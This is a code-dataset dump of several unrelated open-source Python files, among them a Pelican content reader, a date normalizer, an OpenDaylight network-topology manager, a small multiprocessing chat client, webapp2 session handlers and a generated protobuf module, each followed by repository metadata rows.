"Meta tag attribute 'contents' used in file %s, should"
" be changed to 'content'",
self._filename,
extra={'limit_msg': "Other files have meta tag "
"attribute 'contents' that should "
"be changed to 'content'"})
if name == 'keywords':
name = 'tags'
self.metadata[name] = contents
@classmethod
def _attr_value(cls, attrs, name, default=None):
return next((x[1] for x in attrs if x[0] == name), default)
def read(self, filename):
"""Parse content and metadata of HTML files"""
with pelican_open(filename) as content:
parser = self._HTMLParser(self.settings, filename)
parser.feed(content)
parser.close()
metadata = {}
for k in parser.metadata:
metadata[k] = self.process_metadata(k, parser.metadata[k])
return parser.body, metadata
class Readers(FileStampDataCacher):
"""Interface for all readers.
This class contains a mapping of file extensions / Reader classes, to know
which Reader class must be used to read a file (based on its extension).
This is customizable both with the 'READERS' setting, and with the
'readers_init' signall for plugins.
"""
def __init__(self, settings=None, cache_name=''):
self.settings = settings or {}
self.readers = {}
self.reader_classes = {}
for cls in [BaseReader] + BaseReader.__subclasses__():
if not cls.enabled:
logger.debug('Missing dependencies for %s',
', '.join(cls.file_extensions))
continue
for ext in cls.file_extensions:
self.reader_classes[ext] = cls
if self.settings['READERS']:
self.reader_classes.update(self.settings['READERS'])
signals.readers_init.send(self)
for fmt, reader_class in self.reader_classes.items():
if not reader_class:
continue
self.readers[fmt] = reader_class(self.settings)
# set up caching
cache_this_level = (cache_name != '' and
self.settings['CONTENT_CACHING_LAYER'] == 'reader')
caching_policy = cache_this_level and self.settings['CACHE_CONTENT']
load_policy = cache_this_level and self.settings['LOAD_CONTENT_CACHE']
super(Readers, self).__init__(settings, cache_name,
caching_policy, load_policy,
)
@property
def extensions(self):
return self.readers.keys()
def read_file(self, base_path, path, content_class=Page, fmt=None,
context=None, preread_signal=None, preread_sender=None,
context_signal=None, context_sender=None):
"""Return a content object parsed with the given format."""
path = os.path.abspath(os.path.join(base_path, path))
source_path = posixize_path(os.path.relpath(path, base_path))
logger.debug(
'Read file %s -> %s',
source_path, content_class.__name__)
if not fmt:
_, ext = os.path.splitext(os.path.basename(path))
fmt = ext[1:]
if fmt not in self.readers:
raise TypeError(
'Pelican does not know how to parse %s', path)
if preread_signal:
logger.debug(
'Signal %s.send(%s)',
preread_signal.name, preread_sender)
preread_signal.send(preread_sender)
reader = self.readers[fmt]
metadata = _filter_discardable_metadata(default_metadata(
settings=self.settings, process=reader.process_metadata))
metadata.update(path_metadata(
full_path=path, source_path=source_path,
settings=self.settings))
metadata.update(_filter_discardable_metadata(parse_path_metadata(
source_path=source_path, settings=self.settings,
process=reader.process_metadata)))
reader_name = reader.__class__.__name__
metadata['reader'] = reader_name.replace('Reader', '').lower()
content, reader_metadata = self.get_cached_data(path, (None, None))
if content is None:
content, reader_metadata = reader.read(path)
self.cache_data(path, (content, reader_metadata))
metadata.update(_filter_discardable_metadata(reader_metadata))
if content:
# find images with empty alt
find_empty_alt(content, path)
# eventually filter the content with typogrify if asked so
if self.settings['TYPOGRIFY']:
from typogrify.filters import typogrify
import smartypants
# Tell `smartypants` to also replace " HTML entities with
# smart quotes. This is necessary because Docutils has already
# replaced double quotes with said entities by the time we run
# this filter.
smartypants.Attr.default |= smartypants.Attr.w
def typogrify_wrapper(text):
"""Ensures ignore_tags feature is backward compatible"""
try:
return typogrify(
text,
self.settings['TYPOGRIFY_IGNORE_TAGS'])
except TypeError:
return typogrify(text)
if content:
content = typogrify_wrapper(content)
if 'title' in metadata:
metadata['title'] = typogrify_wrapper(metadata['title'])
if 'summary' in metadata:
metadata['summary'] = typogrify_wrapper(metadata['summary'])
if context_signal:
logger.debug(
'Signal %s.send(%s, <metadata>)',
context_signal.name,
context_sender)
context_signal.send(context_sender, metadata=metadata)
return content_class(content=content, metadata=metadata,
settings=self.settings, source_path=path,
context=context)
def find_empty_alt(content, path):
"""Find images with empty alt
Create warnings for all images with empty alt (up to a certain number),
as they are really likely to be accessibility flaws.
"""
imgs = re.compile(r"""
(?:
# src before alt
<img
[^\>]*
src=(['"])(.*?)\1
[^\>]*
alt=(['"])\3
)|(?:
# alt before src
<img
[^\>]*
alt=(['"])\4
[^\>]*
src=(['"])(.*?)\5
)
""", re.X)
for match in re.findall(imgs, content):
logger.warning(
'Empty alt attribute for image %s in %s',
os.path.basename(match[1] + match[5]), path,
extra={'limit_msg': 'Other images have empty alt attributes'})
def default_metadata(settings=None, process=None):
metadata = {}
if settings:
for name, value in dict(settings.get('DEFAULT_METADATA', {})).items():
if process:
value = process(name, value)
metadata[name] = value
if 'DEFAULT_CATEGORY' in settings:
value = settings['DEFAULT_CATEGORY']
if process:
value = process('category', value)
metadata['category'] = value
if settings.get('DEFAULT_DATE', None) and \
settings['DEFAULT_DATE'] != 'fs':
if isinstance(settings['DEFAULT_DATE'], six.string_types):
metadata['date'] = get_date(settings['DEFAULT_DATE'])
else:
metadata['date'] = SafeDatetime(*settings['DEFAULT_DATE'])
return metadata
def path_metadata(full_path, source_path, settings=None):
metadata = {}
if settings:
if settings.get('DEFAULT_DATE', None) == 'fs':
metadata['date'] = SafeDatetime.fromtimestamp(
os.stat(full_path).st_mtime)
metadata.update(settings.get('EXTRA_PATH_METADATA', {}).get(
source_path, {}))
return metadata
def parse_path_metadata(source_path, settings=None, process=None):
r"""Extract a metadata dictionary from a file's path
>>> import pprint
>>> settings = {
... 'FILENAME_METADATA': r'(?P<slug>[^.]*).*',
... 'PATH_METADATA':
... r'(?P<category>[^/]*)/(?P<date>\d{4}-\d{2}-\d{2})/.*',
... }
>>> reader = BaseReader(settings=settings)
>>> metadata = parse_path_metadata(
... source_path='my-cat/2013-01-01/my-slug.html',
... settings=settings,
... process=reader.process_metadata)
>>> pprint.pprint(metadata) # doctest: +ELLIPSIS
{'category': <pelican.urlwrappers.Category object at ...>,
'date': SafeDatetime(2013, 1, 1, 0, 0),
'slug': 'my-slug'}
"""
metadata = {}
dirname, basename = os.path.split(source_path)
base, ext = os.path.splitext(basename)
subdir = os.path.basename(dirname)
if settings:
checks = []
for key, data in [('FILENAME_METADATA', base),
('PATH_METADATA', source_path)]:
checks.append((settings.get(key, None), data))
if settings.get('USE_FOLDER_AS_CATEGORY', None):
checks.append(('(?P<category>.*)', subdir))
for regexp, data in checks:
if regexp and data:
match = re.match(regexp, data)
if match:
# .items() for py3k compat.
for k, v in match.groupdict().items():
k = k.lower() # metadata must be lowercase
if v is not None and k not in metadata:
if process:
v = process(k, v)
metadata[k] = v
return metadata
| agpl-3.0 | 7,005,900,722,206,514,000 | 35.349929 | 79 | 0.559678 | false |
Wikidata/StrepHit | strephit/commons/date_normalizer.py | 1 | 7746 | from __future__ import absolute_import
import yaml
import re
import os
import logging
logger = logging.getLogger(__name__)
class DateNormalizer(object):
"""
find matches in text strings using regular expressions and transforms them
according to a pattern transformation expression evaluated on the match
the specifications are given in yaml format and allow to define meta functions
and meta variables as well as the pattern and transformation rules themselves.
meta variables will be placed inside patterns which use them in order to
make writing patterns easier. meta variables will be available to use from
inside the meta functions too as a dictionary named meta_vars
a pattern transformation expression is an expression which will be evaluated
if the corresponding regular expression matches. the pattern transformation
will have access to all the meta functions and meta variables defined and
to a variable named 'match' containing the regex match found
"""
def __init__(self, language=None, specs=None):
assert language or specs, 'please specify either one of the pre-set ' \
'languages or provide a custom rule set'
if specs is None:
path = os.path.join(os.path.dirname(__file__), 'resources',
'normalization_rules_%s.yml' % language)
with open(path) as f:
specs = yaml.load(f)
self._meta_init(specs)
basic_r = {name: pattern for name, pattern in self.meta_vars.iteritems()}
self.regexes = {}
for category, regexes in specs.iteritems():
regexes = sum((x.items() for x in regexes), [])
self.regexes[category] = [(re.compile(pattern.format(**basic_r)
.replace(' ', '\\s*'),
re.IGNORECASE), result)
for pattern, result in regexes]
def _meta_init(self, specs):
""" Reads the meta variables and the meta functions from the specification
:param dict specs: The specifications loaded from the file
:return: None
"""
# read meta variables and perform substitutions
self.meta_vars = {}
if '__meta_vars__' in specs:
for definition in specs.pop('__meta_vars__'):
var, value = definition.items()[0]
if isinstance(value, basestring):
self.meta_vars[var] = value.format(**self.meta_vars)
elif isinstance(value, dict):
self.meta_vars[var] = {
k: v.format(**self.meta_vars) for k, v in value.iteritems()
}
# compile meta functions in a dictionary
self.meta_funcs = {}
if '__meta_funcs__' in specs:
for f in specs.pop('__meta_funcs__'):
exec f in self.meta_funcs
# make meta variables available to the meta functions just defined
self.meta_funcs['__builtins__']['meta_vars'] = self.meta_vars
self.globals = self.meta_funcs
self.globals.update(self.meta_vars)
def normalize_one(self, expression, conflict='longest'):
""" Find the matching part in the given expression
:param str expression: The expression in which to search the match
:param str conflict: Whether to return the first match found or scan
through all the provided regular expressions and return the longest
or shortest part of the string matched by a regular expression.
Note that the match will always be the first one found in the string,
this parameter tells how to resolve conflicts when there is more than
one regular expression that returns a match. When more matches have
the same length the first one found counts
Allowed values are `first`, `longest` and `shortest`
:return: Tuple with (start, end), category, result
:rtype: tuple
Sample usage:
>>> from strephit.commons.date_normalizer import DateNormalizer
>>> DateNormalizer('en').normalize_one('Today is the 1st of June, 2016')
((13, 30), 'Time', {'month': 6, 'day': 1, 'year': 2016})
"""
best_match = None
expression = expression.lower()
for category, regexes in self.regexes.iteritems():
for regex, transform in regexes:
match = regex.search(expression)
if not match:
continue
elif conflict == 'first':
return self._process_match(category, transform, match, 0)
elif best_match is None or \
conflict == 'longest' and match.end() - match.start() > best_match[1] or \
conflict == 'shortest' and match.end() - match.start() < best_match[1]:
best_match = match, match.end() - match.start(), category, transform
if best_match is None:
return (-1, -1), None, None
else:
match, _, category, transform = best_match
return self._process_match(category, transform, match, 0)
def normalize_many(self, expression):
""" Find all the matching entities in the given expression expression
:param str expression: The expression in which to look for
:return: Generator of tuples (start, end), category, result
Sample usage:
>>> from pprint import pprint
>>> from strephit.commons.date_normalizer import DateNormalizer
>>> pprint(list(DateNormalizer('en').normalize_many('I was born on April 18th, '
... 'and today is April 18th, 2016!')))
[((14, 24), 'Time', {'day': 18, 'month': 4}),
((39, 55), 'Time', {'day': 18, 'month': 4, 'year': 2016})]
"""
# start matching from here, and move forward as new matches
# are found so to avoid overlapping matches and return
# the correct offset inside the original sentence
position = 0
expression = expression.lower()
for category, regexes in self.regexes.iteritems():
for regex, transform in regexes:
end = 0
for match in regex.finditer(expression[position:]):
yield self._process_match(category, transform, match, position)
end = max(end, match.end())
position += end
def _process_match(self, category, transform, match, first_position):
result = eval(transform, self.globals, {'match': match})
start, end = match.span()
return (first_position + start, first_position + end), category, result
NORMALIZERS = {}
def normalize_numerical_fes(language, text):
""" Normalize numerical FEs in a sentence
"""
if language not in NORMALIZERS:
NORMALIZERS[language] = DateNormalizer(language)
normalizer = NORMALIZERS[language]
logger.debug('labeling and normalizing numerical FEs of language %s...', language)
count = 0
for (start, end), tag, norm in normalizer.normalize_many(text):
chunk = text[start:end]
logger.debug('Chunk [%s] normalized into [%s], tagged as [%s]' % (chunk, norm, tag))
# All numerical FEs are extra ones and their values are literals
fe = {
'fe': tag,
'chunk': chunk,
'type': 'extra',
'literal': norm,
'score': 1.0
}
count += 1
yield fe
logger.debug('found %d numerical FEs into "%s"', count, text)
| gpl-3.0 | 4,360,993,509,104,244,700 | 41.097826 | 98 | 0.590627 | false |
FedericoRessi/networking-odl | networking_odl/ml2/network_topology.py | 1 | 12691 | # Copyright (c) 2015-2016 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import importlib
import logging
import six
from six.moves.urllib import parse
from neutron.extensions import portbindings
from oslo_log import log
from oslo_serialization import jsonutils
from networking_odl.common import cache
from networking_odl.common import client
from networking_odl.common import utils
from networking_odl.common._i18n import _LI, _LW, _LE
LOG = log.getLogger(__name__)
class NetworkTopologyManager(object):
# the first valid vif type will be chosed following the order
# on this list. This list can be modified to adapt to user preferences.
valid_vif_types = [
portbindings.VIF_TYPE_VHOST_USER, portbindings.VIF_TYPE_OVS]
# List of class names of registered implementations of interface
# NetworkTopologyParser
network_topology_parsers = [
'networking_odl.ml2.ovsdb_topology.OvsdbNetworkTopologyParser']
def __init__(self, vif_details=None, client=None):
# Details for binding port
self._vif_details = vif_details or {}
# Rest client used for getting network topology from ODL
self._client = client or NetworkTopologyClient.create_client()
# Table of NetworkTopologyElement
self._elements_by_ip = cache.Cache(
self._fetch_and_parse_network_topology)
# Parsers used for processing network topology
self._parsers = list(self._create_parsers())
def bind_port(self, port_context):
"""Set binding for a valid segment
"""
host_name = port_context.host
elements = list()
try:
# Append to empty list to add as much elements as possible
# in the case it raises an exception
elements.extend(self._fetch_elements_by_host(host_name))
except Exception:
LOG.exception(
_LE('Error fetching elements for host %(host_name)r.'),
{'host_name': host_name}, exc_info=1)
if not elements:
# In case it wasn't able to find any network topology element
# for given host then it uses the legacy OVS one keeping the old
# behaviour
LOG.warning(
_LW('Using legacy OVS network topology element for port '
'binding for host: %(host_name)r.'),
{'host_name': host_name})
# Imported here to avoid cyclic module dependencies
from networking_odl.ml2 import ovsdb_topology
elements = [ovsdb_topology.OvsdbNetworkTopologyElement()]
# TODO(Federico Ressi): in the case there are more candidate virtual
# switches instances for the same host it choses one for binding
# port. As there isn't any know way to perform this selection it
# selects a VIF type that is valid for all switches that have
# been found and a VIF type valid for all them. This has to be improved
for vif_type in self.valid_vif_types:
vif_type_is_valid_for_all = True
for element in elements:
if vif_type not in element.valid_vif_types:
# it is invalid for at least one element: discard it
vif_type_is_valid_for_all = False
break
if vif_type_is_valid_for_all:
# This is the best VIF type valid for all elements
LOG.debug(
"Found VIF type %(vif_type)r valid for all network "
"topology elements for host %(host_name)r.",
{'vif_type': vif_type, 'host_name': host_name})
for element in elements:
# It assumes that any element could be good for given host
# In most of the cases I expect exactely one element for
# every compute host
try:
return element.bind_port(
port_context, vif_type, self._vif_details)
except Exception:
LOG.exception(
_LE('Network topology element has failed binding '
'port:\n%(element)s'),
{'element': element.to_json()})
LOG.error(
_LE('Unable to bind port element for given host and valid VIF '
'types:\n'
'\thostname: %(host_name)s\n'
'\tvalid VIF types: %(valid_vif_types)s'),
{'host_name': host_name,
'valid_vif_types': ', '.join(self.valid_vif_types)})
# TDOO(Federico Ressi): should I raise an exception here?
def _create_parsers(self):
for parser_name in self.network_topology_parsers:
try:
yield NetworkTopologyParser.create_parser(parser_name)
except Exception:
LOG.exception(
_LE('Error initializing topology parser: %(parser_name)r'),
{'parser_name': parser_name})
def _fetch_elements_by_host(self, host_name, cache_timeout=60.0):
'''Yields all network topology elements referring to given host name
'''
host_addresses = [host_name]
try:
# It uses both compute host name and known IP addresses to
# recognize topology elements valid for given computed host
ip_addresses = utils.get_addresses_by_name(host_name)
except Exception:
ip_addresses = []
LOG.exception(
_LE('Unable to resolve IP addresses for host %(host_name)r'),
{'host_name': host_name})
else:
host_addresses.extend(ip_addresses)
yield_elements = set()
try:
for _, element in self._elements_by_ip.fetch_all(
host_addresses, cache_timeout):
# yields every element only once
if element not in yield_elements:
yield_elements.add(element)
yield element
except cache.CacheFetchError as error:
# This error is expected on most of the cases because typically not
# all host_addresses maps to a network topology element.
if yield_elements:
# As we need only one element for every host we ignore the
# case in which others host addresseses didn't map to any host
LOG.debug(
'Host addresses not found in networking topology: %s',
', '.join(error.missing_keys))
else:
LOG.exception(
_LE('No such network topology elements for given host '
'%(host_name)r and given IPs: %(ip_addresses)s.'),
{'host_name': host_name,
'ip_addresses': ", ".join(ip_addresses)})
error.reraise_cause()
def _fetch_and_parse_network_topology(self, addresses):
# The cache calls this method to fecth new elements when at least one
# of the addresses is not in the cache or it has expired.
# pylint: disable=unused-argument
LOG.info(_LI('Fetch network topology from ODL.'))
response = self._client.get()
response.raise_for_status()
network_topology = response.json()
if LOG.isEnabledFor(logging.DEBUG):
topology_str = jsonutils.dumps(
network_topology, sort_keys=True, indent=4,
separators=(',', ': '))
LOG.debug("Got network topology:\n%s", topology_str)
at_least_one_element_for_asked_addresses = False
for parser in self._parsers:
try:
for element in parser.parse_network_topology(network_topology):
if not isinstance(element, NetworkTopologyElement):
raise TypeError(
"Yield element doesn't implement interface "
"'NetworkTopologyElement': {!r}".format(element))
# the same element can be known by more host addresses
for host_address in element.host_addresses:
if host_address in addresses:
at_least_one_element_for_asked_addresses = True
yield host_address, element
except Exception:
LOG.exception(
_LE("Parser %(parser)r failed to parse network topology."),
{'parser': parser})
if not at_least_one_element_for_asked_addresses:
# this will mark entries for given addresses as failed to allow
# calling this method again as soon it is requested and avoid
# waiting for cache expiration
raise ValueError(
'No such topology element for given host addresses: {}'.format(
', '.join(addresses)))
@six.add_metaclass(abc.ABCMeta)
class NetworkTopologyParser(object):
@classmethod
def create_parser(cls, parser_class_name):
'''Creates a 'NetworkTopologyParser' of given class name.
'''
module_name, class_name = parser_class_name.rsplit('.', 1)
module = importlib.import_module(module_name)
clss = getattr(module, class_name)
if not issubclass(clss, cls):
raise TypeError(
"Class {class_name!r} of module {module_name!r} doesn't "
"implement 'NetworkTopologyParser' interface.".format(
class_name=class_name, module_name=module_name))
return clss()
@abc.abstractmethod
def parse_network_topology(self, network_topology):
'''Parses OpenDaylight network topology
Yields all network topology elements implementing
'NetworkTopologyElement' interface found in given network topology.
'''
@six.add_metaclass(abc.ABCMeta)
class NetworkTopologyElement(object):
@abc.abstractproperty
def host_addresses(self):
'''List of known host addresses of a single compute host
Either host names and ip addresses are valid.
Neutron host controller must know at least one of these compute host
names or ip addresses to find this element.
'''
@abc.abstractproperty
def valid_vif_types(self):
'''Returns a tuple listing VIF types supported by the compute node
'''
@abc.abstractmethod
def bind_port(self, port_context, vif_type, vif_details):
'''Bind port context using given vif type and vit details
This method is expected to search for a valid segment and then
call following method:
from neutron.common import constants
from neutron.plugins.ml2 import driver_api
port_context.set_binding(
valid_segment[driver_api.ID], vif_type, vif_details,
status=constants.PORT_STATUS_ACTIVE)
'''
def to_dict(self):
cls = type(self)
return {
'class': cls.__module__ + '.' + cls.__name__,
'host_addresses': list(self.host_addresses),
'valid_vif_types': list(self.valid_vif_types)}
def to_json(self):
return jsonutils.dumps(
self.to_dict(), sort_keys=True, indent=4, separators=(',', ': '))
class NetworkTopologyClient(client.OpenDaylightRestClient):
_GET_ODL_NETWORK_TOPOLOGY_URL =\
'restconf/operational/network-topology:network-topology'
def __init__(self, url, username, password, timeout):
if url:
url = parse.urlparse(url)
port = ''
if url.port:
port = ':' + str(url.port)
topology_url = '{}://{}{}/{}'.format(
url.scheme, url.hostname, port,
self._GET_ODL_NETWORK_TOPOLOGY_URL)
else:
topology_url = None
super(NetworkTopologyClient, self).__init__(
topology_url, username, password, timeout)
| apache-2.0 | 132,776,603,059,931,380 | 38.659375 | 79 | 0.588527 | false |
tayebzaidi/PPLL_Spr_16 | chat/client3.py | 1 | 1260 | from multiprocessing.connection import Client
from random import random
from time import sleep
from multiprocessing.connection import Listener
from multiprocessing import Process
local_listener = (('127.0.0.1', 5003),'secret client 3 password')
def client_listener():
cl = Listener(address=local_listener[0], authkey=local_listener[1])
print '.............client listener starting'
print '.............accepting conexions'
while True:
conn = cl.accept()
print '.............connection accepted from', cl.last_accepted
m = conn.recv()
print '.............message received from server', m
if __name__ == '__main__':
print 'trying to connect'
conn = Client(address=('127.0.0.1', 6000), authkey='secret password server')
conn.send(local_listener)
cl = Process(target=client_listener, args=())
cl.start()
connected = True
while connected:
value = raw_input("'C', stay connected. 'Q' quit connection")
if value == 'Q':
connected = False
else:
print "continue connected"
conn.send("connected")
print "last message"
conn.send("quit")
conn.close()
cl.terminate()
print "end client"
| gpl-3.0 | 7,113,699,005,899,186,000 | 28.302326 | 80 | 0.605556 | false |
laalaguer/gae-blog-module | gaesession/handlers.py | 1 | 7633 | import webapp2
from webapp2_extras import sessions
class MainHandler(webapp2.RequestHandler):
def get(self):
# Session is stored on both client browser and our database
session_1 = self.session_store.get_session(name='dbcookie',backend='datastore')
previous_value_1 = session_1.get("my_attr_name")
self.response.out.write('on db, ' + str(previous_value_1))
session_1["my_attr_name"] = "Hi! " + (previous_value_1 if previous_value_1 else "")
self.response.out.write('<br>')
# Session is stored on client browser only
session_2 = self.session_store.get_session(name='clientcookie')
previous_value_2 = session_2.get('my_attr_name')
self.response.out.write('on client browser, ' + str(previous_value_2))
session_2['my_attr_name'] = "Hi! " + (previous_value_2 if previous_value_2 else "")
self.response.out.write('<br>')
# Session is stored on both client browser and our memcache for fast access
session_3 = self.session_store.get_session(name='memcachecookie',backend="memcache")
previous_value_3 = session_3.get('my_attr_name')
self.response.out.write('on memcache, ' + str(previous_value_3))
session_3['my_attr_name'] = "Hi! " + (previous_value_3 if previous_value_3 else "")
# this is needed for webapp2 sessions to work
def dispatch(self):
# Get a session store for this request.
self.session_store = sessions.get_store(request=self.request)
try:
webapp2.RequestHandler.dispatch(self)
finally:
# Save all sessions.
self.session_store.save_sessions(self.response)
class MainHandlerWithArguments(webapp2.RequestHandler):
def get(self, photo_key): # even with arguments, we call with dispatch(self)
# Session is stored on both client browser and our database
session_1 = self.session_store.get_session(name='dbcookie',backend='datastore')
previous_value_1 = session_1.get("my_attr_name")
self.response.out.write('on db, ' + str(previous_value_1))
session_1["my_attr_name"] = "Hi! " + (previous_value_1 if previous_value_1 else "")
self.response.out.write('<br>')
# Session is stored on client browser only
session_2 = self.session_store.get_session(name='clientcookie')
previous_value_2 = session_2.get('my_attr_name')
self.response.out.write('on client browser, ' + str(previous_value_2))
session_2['my_attr_name'] = "Hi! " + (previous_value_2 if previous_value_2 else "")
self.response.out.write('<br>')
# Session is stored on both client browser and our memcache for fast access
session_3 = self.session_store.get_session(name='memcachecookie',backend="memcache")
previous_value_3 = session_3.get('my_attr_name')
self.response.out.write('on memcache, ' + str(previous_value_3))
session_3['my_attr_name'] = "Hi! " + (previous_value_3 if previous_value_3 else "")
# this is needed for webapp2 sessions to work
def dispatch(self):
# Get a session store for this request.
self.session_store = sessions.get_store(request=self.request)
try:
webapp2.RequestHandler.dispatch(self)
finally:
# Save all sessions.
self.session_store.save_sessions(self.response)
from google.appengine.ext.webapp import blobstore_handlers
from google.appengine.ext import blobstore
class MyUploadHandler(blobstore_handlers.BlobstoreUploadHandler):
def my_post_dispatch(self, *args, **kwargs):
''' A Fake dispatch method that you want to call inside your Route()
Just an imitation of the webapp2 style dispatch() with limited functions
'''
self.session_store = sessions.get_store(request=self.request)
try:
if self.request.method == 'POST':
self.post(*args, **kwargs) # since webapp doesn't have dispatch() method like webapp2, we do it manually
else:
self.error(405)
self.response.out.write('Method not allowed')
finally:
# Save all sessions.
self.session_store.save_sessions(self.response)
def wrapper(func):
def dest(self, *args, **kwargs):
print 'before decorated' # for your future use. you can write wrapper like 'user_required'
func(self,*args, **kwargs)
print 'after decorated'
return dest
@wrapper
def post(self):
# Get all the uploaded file info
myfiles = self.get_uploads('file') # this is a list of blob key info
# You do some operations on the myfiles, maybe transform them
# maybe associate them with other ndb entities in your database
# ...
# But we also want to manipulate with the session, RIGHT ???
# Session is stored on both client browser and our database
session_1 = self.session_store.get_session(name='dbcookie',backend='datastore')
previous_value_1 = session_1.get("my_attr_name")
self.response.out.write('on db, ' + str(previous_value_1))
session_1["my_attr_name"] = "Hi! " + (previous_value_1 if previous_value_1 else "")
self.response.out.write('<br>')
# Session is stored on client browser only
session_2 = self.session_store.get_session(name='clientcookie')
previous_value_2 = session_2.get('my_attr_name')
self.response.out.write('on client browser, ' + str(previous_value_2))
session_2['my_attr_name'] = "Hi! " + (previous_value_2 if previous_value_2 else "")
self.response.out.write('<br>')
# Session is stored on both client browser and our memcache for fast access
session_3 = self.session_store.get_session(name='memcachecookie',backend="memcache")
previous_value_3 = session_3.get('my_attr_name')
self.response.out.write('on memcache, ' + str(previous_value_3))
session_3['my_attr_name'] = "Hi! " + (previous_value_3 if previous_value_3 else "")
# Finally, I delete them,just in case you won't let it go.
[blobstore.delete(each.key()) for each in self.get_uploads('file')]
class ServeBlobHandler(blobstore_handlers.BlobstoreDownloadHandler):
''' Serve the images to the public '''
def my_get_dispatch(self, *args, **kwargs):
''' A Fake dispatch method that you want to call inside your Route()
Just an imitation of the webapp2 style dispatch() with limited functions
'''
self.session_store = sessions.get_store(request=self.request)
try:
if self.request.method == 'GET':
self.get(*args, **kwargs) # this is the real get method we want here
else:
self.error(405)
self.response.out.write('Method not allowed')
finally:
# Save all sessions.
self.session_store.save_sessions(self.response)
def wrapper(func):
def dest(self, *args, **kwargs):
print 'before decorated' # for your future use. you can write wrapper like 'user_required'
func(self,*args, **kwargs)
print 'after decorated'
return dest
@wrapper
def get(self, photo_key):
if not blobstore.get(photo_key):
self.error(404)
else:
self.send_blob(photo_key) | apache-2.0 | -2,670,067,092,621,807,600 | 45.266667 | 120 | 0.617844 | false |
fluxcapacitor/pipeline | libs/pipeline_model/tensorflow/core/framework/tensor_slice_pb2.py | 1 | 4870 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: tensorflow/core/framework/tensor_slice.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='tensorflow/core/framework/tensor_slice.proto',
package='tensorflow',
syntax='proto3',
serialized_pb=_b('\n,tensorflow/core/framework/tensor_slice.proto\x12\ntensorflow\"\x80\x01\n\x10TensorSliceProto\x12\x33\n\x06\x65xtent\x18\x01 \x03(\x0b\x32#.tensorflow.TensorSliceProto.Extent\x1a\x37\n\x06\x45xtent\x12\r\n\x05start\x18\x01 \x01(\x03\x12\x10\n\x06length\x18\x02 \x01(\x03H\x00\x42\x0c\n\nhas_lengthB2\n\x18org.tensorflow.frameworkB\x11TensorSliceProtosP\x01\xf8\x01\x01\x62\x06proto3')
)
_TENSORSLICEPROTO_EXTENT = _descriptor.Descriptor(
name='Extent',
full_name='tensorflow.TensorSliceProto.Extent',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='start', full_name='tensorflow.TensorSliceProto.Extent.start', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='length', full_name='tensorflow.TensorSliceProto.Extent.length', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='has_length', full_name='tensorflow.TensorSliceProto.Extent.has_length',
index=0, containing_type=None, fields=[]),
],
serialized_start=134,
serialized_end=189,
)
_TENSORSLICEPROTO = _descriptor.Descriptor(
name='TensorSliceProto',
full_name='tensorflow.TensorSliceProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='extent', full_name='tensorflow.TensorSliceProto.extent', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TENSORSLICEPROTO_EXTENT, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=61,
serialized_end=189,
)
_TENSORSLICEPROTO_EXTENT.containing_type = _TENSORSLICEPROTO
_TENSORSLICEPROTO_EXTENT.oneofs_by_name['has_length'].fields.append(
_TENSORSLICEPROTO_EXTENT.fields_by_name['length'])
_TENSORSLICEPROTO_EXTENT.fields_by_name['length'].containing_oneof = _TENSORSLICEPROTO_EXTENT.oneofs_by_name['has_length']
_TENSORSLICEPROTO.fields_by_name['extent'].message_type = _TENSORSLICEPROTO_EXTENT
DESCRIPTOR.message_types_by_name['TensorSliceProto'] = _TENSORSLICEPROTO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
TensorSliceProto = _reflection.GeneratedProtocolMessageType('TensorSliceProto', (_message.Message,), dict(
Extent = _reflection.GeneratedProtocolMessageType('Extent', (_message.Message,), dict(
DESCRIPTOR = _TENSORSLICEPROTO_EXTENT,
__module__ = 'tensorflow.core.framework.tensor_slice_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.TensorSliceProto.Extent)
))
,
DESCRIPTOR = _TENSORSLICEPROTO,
__module__ = 'tensorflow.core.framework.tensor_slice_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.TensorSliceProto)
))
_sym_db.RegisterMessage(TensorSliceProto)
_sym_db.RegisterMessage(TensorSliceProto.Extent)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\030org.tensorflow.frameworkB\021TensorSliceProtosP\001\370\001\001'))
try:
# THESE ELEMENTS WILL BE DEPRECATED.
# Please use the generated *_pb2_grpc.py files instead.
import grpc
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
except ImportError:
pass
# @@protoc_insertion_point(module_scope)
| apache-2.0 | 6,296,427,293,374,174,000 | 35.343284 | 406 | 0.742094 | false |
